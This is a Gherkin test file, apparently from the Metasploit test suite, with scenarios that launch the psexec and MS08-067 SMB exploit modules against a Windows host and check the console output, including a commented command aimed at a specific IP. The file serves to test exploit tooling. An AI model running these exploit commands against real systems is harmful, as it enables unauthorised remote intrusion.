32 lines
1.3 KiB
Gherkin
32 lines
1.3 KiB
Gherkin
#This feature contains scenarios that test running exploits related to microsft windows platforms
|
|
|
|
@announce-stdout
|
|
|
|
Feature: I want to launch Windows based exploits
|
|
So that I can hack Windows targets
|
|
So that I can prove how totally unsecured Windows can be
|
|
|
|
Scenario: Launch Psexec against a Windows Host
|
|
When I run the "./msfcli windows/smb/psexec" exploit with standard target options
|
|
Then the output should contain "445|WORKGROUP as user"
|
|
Then the output should contain "module tree"
|
|
|
|
Scenario: Launch PSexec in Internal Check Mode
|
|
When I run the "./msfcli windows/smb/psexec" exploit with standard target options in check mode
|
|
Then the output should contain "module tree"
|
|
Then the output should contain "This exploit does not support check."
|
|
|
|
Scenario: Launch ms08-067 in Internal Check Mode
|
|
When I run the "./msfcli windows/smb/ms08_067_netapi" exploit with standard target options in check mode
|
|
#When I run `./msfcli windows/smb/ms08_067_netapi RHOST=10.6.0.194 C` interactively
|
|
Then the output should contain "module tree"
|
|
Then the output should not contain "Check failed:"
|
|
|
|
Scenario: Launch ms08-067 against a windows remote host
|
|
When I run the "./msfcli windows/smb/ms08_067_netapi" exploit with standard target options
|
|
Then the output should contain "module tree"
|
|
Then the output should contain "Started reverse handler"
|
|
|
|
|
|
|